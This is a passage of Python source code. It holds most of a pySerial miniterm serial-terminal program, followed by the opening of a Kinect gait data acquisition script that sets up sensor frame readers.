def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
import platform
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
fncodes = {
';': '\1bOP', # F1
'<': '\1bOQ', # F2
'=': '\1bOR', # F3
'>': '\1bOS', # F4
'?': '\1b[15~', # F5
'@': '\1b[17~', # F6
'A': '\1b[18~', # F7
'B': '\1b[19~', # F8
'C': '\1b[20~', # F9
'D': '\1b[21~', # F10
}
navcodes = {
'H': '\x1b[A', # UP
'P': '\x1b[B', # DOWN
'K': '\x1b[D', # LEFT
'M': '\x1b[C', # RIGHT
'G': '\x1b[H', # HOME
'O': '\x1b[F', # END
'R': '\x1b[2~', # INSERT
'S': '\x1b[3~', # DELETE
'I': '\x1b[5~', # PGUP
'Q': '\x1b[6~', # PGDN
}
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
# ANSI handling available through SetConsoleMode since Windows 10 v1511
# https://en.wikipedia.org/wiki/ANSI_escape_code#cite_note-win10th2-1
if platform.release() == '10' and int(platform.version().split('.')[2]) > 10586:
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004
import ctypes.wintypes as wintypes
if not hasattr(wintypes, 'LPDWORD'): # PY2
wintypes.LPDWORD = ctypes.POINTER(wintypes.DWORD)
SetConsoleMode = ctypes.windll.kernel32.SetConsoleMode
GetConsoleMode = ctypes.windll.kernel32.GetConsoleMode
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
mode = wintypes.DWORD()
GetConsoleMode(GetStdHandle(-11), ctypes.byref(mode))
if (mode.value & ENABLE_VIRTUAL_TERMINAL_PROCESSING) == 0:
SetConsoleMode(GetStdHandle(-11), mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
self._saved_cm = mode
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
try:
ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), self._saved_cm)
except AttributeError: # in case no _saved_cm
pass
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z is unichr(0) or z is unichr(0xe0):
try:
code = msvcrt.getwch()
if z is unichr(0):
return self.fncodes[code]
else:
return self.navcodes[code]
except KeyError:
pass
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{!r}] '.format(text))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{!r}] '.format(text))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = unichr(0x1d) # GS/CTRL+]
self.menu_character = unichr(0x14) # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
line=""
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
if(ord(c)==8): #backspace
line=line[:-1]
elif(ord(c)==10): # enter
line=line+"\r\n"
for t in line:
self.serial.write(self.tx_encoder.encode(t))
line=""
else:
line+= text
# continue
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'zZ': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
elif c in 'qQ':
self.stop() # Q -> exit app
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {!r}\n'.format(f))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program (alias {menu} Q)
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description='Miniterm - A simple terminal program for the serial port.')
parser.add_argument(
'port',
nargs='?',
help='serial port name ("-" to show port list)',
default=default_port)
parser.add_argument(
'baudrate',
nargs='?',
type=int,
help='set baud rate, default: %(default)s',
default=default_baudrate)
group = parser.add_argument_group('port settings')
group.add_argument(
'--parity',
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help='set parity, one of {N E O S M}, default: N',
default='N')
group.add_argument(
'--rtscts',
action='store_true',
help='enable RTS/CTS flow control (default off)',
default=False)
group.add_argument(
'--xonxoff',
action='store_true',
help='enable software flow control (default off)',
default=False)
group.add_argument(
'--rts',
type=int,
help='set initial RTS line state (possible values: 0, 1)',
default=default_rts)
group.add_argument(
'--dtr',
type=int,
help='set initial DTR line state (possible values: 0, 1)',
default=default_dtr)
group.add_argument(
'--non-exclusive',
dest='exclusive',
action='store_false',
help='disable locking for native ports',
default=True)
group.add_argument(
'--ask',
action='store_true',
help='ask again for port when open fails',
default=False)
group = parser.add_argument_group('data handling')
group.add_argument(
'-e', '--echo',
action='store_true',
help='enable local echo (default off)',
default=False)
group.add_argument(
'--encoding',
dest='serial_port_encoding',
metavar='CODEC',
help='set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s',
default='UTF-8')
group.add_argument(
'-f', '--filter',
action='append',
metavar='NAME',
help='add text transformation',
default=[])
group.add_argument(
'--eol',
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help='end of line mode',
default='CRLF')
group.add_argument(
'--raw',
action='store_true',
help='Do no apply any encodings/transformations',
default=False)
group = parser.add_argument_group('hotkeys')
group.add_argument(
'--exit-char',
type=int,
metavar='NUM',
help='Unicode of special character that is used to exit the application, default: %(default)s',
default=0x1d) # GS/CTRL+]
group.add_argument(
'--menu-char',
type=int,
metavar='NUM',
help='Unicode code of special character that is used to control miniterm (menu), default: %(default)s',
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group('diagnostics')
group.add_argument(
'-q', '--quiet',
action='store_true',
help='suppress non-error messages',
default=False)
group.add_argument(
'--develop',
action='store_true',
help='show Python traceback on error',
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
if isinstance(serial_instance, serial.Serial):
serial_instance.exclusive = args.exclusive
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {!r}: {}\n'.format(args.port, e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write('\n--- exit ---\n')
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
Kinect-based_gait_data_acquisition_system.py
|
'''The MIT License (MIT)
Copyright (c) Microsoft
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from pykinect2 import PyKinectV2
from pykinect2.PyKinectV2 import *
import ctypes
import _ctypes
import pygame
import sys
import numpy
if sys.hexversion >= 0x03000000:
import _thread as thread
else:
import thread
from pygame.locals import *
from pgu import gui
import time, sched
import threading
from socket import *
from datetime import datetime
import cv2
import heapq
from collections import namedtuple
from time import monotonic as _time
import openpyxl
from openpyxl import load_workbook
from openpyxl import Workbook
import numpy as np
from matplotlib import pyplot as plt
import pymysql
KINECT_MAX_BODY_COUNT = 6
class PyKinectRuntime(object):
"""manages Kinect objects and simplifying access to them"""
def __init__(self, frame_source_types):
# recipe to get address of surface: http://archives.seul.org/pygame/users/Apr-2008/msg00218.html
is_64bits = sys.maxsize > 2**32
if not is_64bits:
self.Py_ssize_t = ctypes.c_int
else:
self.Py_ssize_t = ctypes.c_int64
self._PyObject_AsWriteBuffer = ctypes.pythonapi.PyObject_AsWriteBuffer
self._PyObject_AsWriteBuffer.restype = ctypes.c_int
self._PyObject_AsWriteBuffer.argtypes = [ctypes.py_object,
ctypes.POINTER(ctypes.c_void_p),
ctypes.POINTER(self.Py_ssize_t)]
#self._color_frame_ready = PyKinectV2._event()
#self._depth_frame_ready = PyKinectV2._event()
#self._body_frame_ready = PyKinectV2._event()
#self._body_index_frame_ready = PyKinectV2._event()
#self._infrared_frame_ready = PyKinectV2._event()
#self._long_exposure_infrared_frame_ready = PyKinectV2._event()
#self._audio_frame_ready = PyKinectV2._event()
self._close_event = ctypes.windll.kernel32.CreateEventW(None, False, False, None)
self._color_frame_arrived_event = 0
self._depth_frame_arrived_event = 0
self._body_frame_arrived_event = 0
self._body_index_frame_arrived_event = 0
self._infrared_frame_arrived_event = 0
self._long_exposure_infrared_frame_arrived_event = 0
self._audio_frame_arrived_event = 0
self._color_frame_lock = thread.allocate()
self._depth_frame_lock = thread.allocate()
self._body_frame_lock = thread.allocate()
self._body_index_frame_lock = thread.allocate()
self._infrared_frame_lock = thread.allocate()
self._long_exposure_infrared_frame_lock = thread.allocate()
self._audio_frame_lock = thread.allocate()
#initialize sensor
self._sensor = ctypes.POINTER(PyKinectV2.IKinectSensor)()
hres = ctypes.windll.kinect20.GetDefaultKinectSensor(ctypes.byref(self._sensor))
hres = self._sensor.Open()
self._mapper = self._sensor.CoordinateMapper
self.frame_source_types = frame_source_types
self.max_body_count = KINECT_MAX_BODY_COUNT
self._handles = (ctypes.c_voidp * 8)()
self._handles[0] = self._close_event
self._handles[1] = self._close_event
self._handles[2] = self._close_event
self._handles[3] = self._close_event
self._handles[4] = self._close_event
self._handles[5] = self._close_event
self._handles[6] = self._close_event
self._handles[7] = self._close_event
self._waitHandleCount = 1
self._color_source = self._sensor.ColorFrameSource
self.color_frame_desc = self._color_source.FrameDescription
self._infrared_source = self._sensor.InfraredFrameSource
self.infrared_frame_desc = self._infrared_source.FrameDescription
self._depth_source = self._sensor.DepthFrameSource
self.depth_frame_desc = self._depth_source.FrameDescription
self._body_index_source = self._sensor.BodyIndexFrameSource
self.body_index_frame_desc = self._body_index_source.FrameDescription
self._body_source = self._sensor.BodyFrameSource
self._body_frame_data = ctypes.POINTER(ctypes.POINTER(IBody))
self.max_body_count = self._body_source.BodyCount
self._color_frame_data = None
self._depth_frame_data = None
self._body_frame_data = None
self._body_index_frame_data = None
self._infrared_frame_data = None
self._long_exposure_infrared_frame_data = None
self._audio_frame_data = None
if(self.frame_source_types & FrameSourceTypes_Color):
self._color_frame_data = ctypes.POINTER(ctypes.c_ubyte)
self._color_frame_data_capacity = ctypes.c_uint(self.color_frame_desc.Width * self.color_frame_desc.Height * 4)
self._color_frame_data_type = ctypes.c_ubyte * self._color_frame_data_capacity.value
self._color_frame_data = ctypes.cast(self._color_frame_data_type(), ctypes.POINTER(ctypes.c_ubyte))
self._color_frame_reader = self._color_source.OpenReader()
self._color_frame_arrived_event = self._color_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._color_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_Infrared):
self._infrared_frame_data = ctypes.POINTER(ctypes.c_ushort)
self._infrared_frame_data_capacity = ctypes.c_uint(self.infrared_frame_desc.Width * self.infrared_frame_desc.Height)
self._infrared_frame_data_type = ctypes.c_ushort * self._infrared_frame_data_capacity.value
self._infrared_frame_data = ctypes.cast(self._infrared_frame_data_type(), ctypes.POINTER(ctypes.c_ushort))
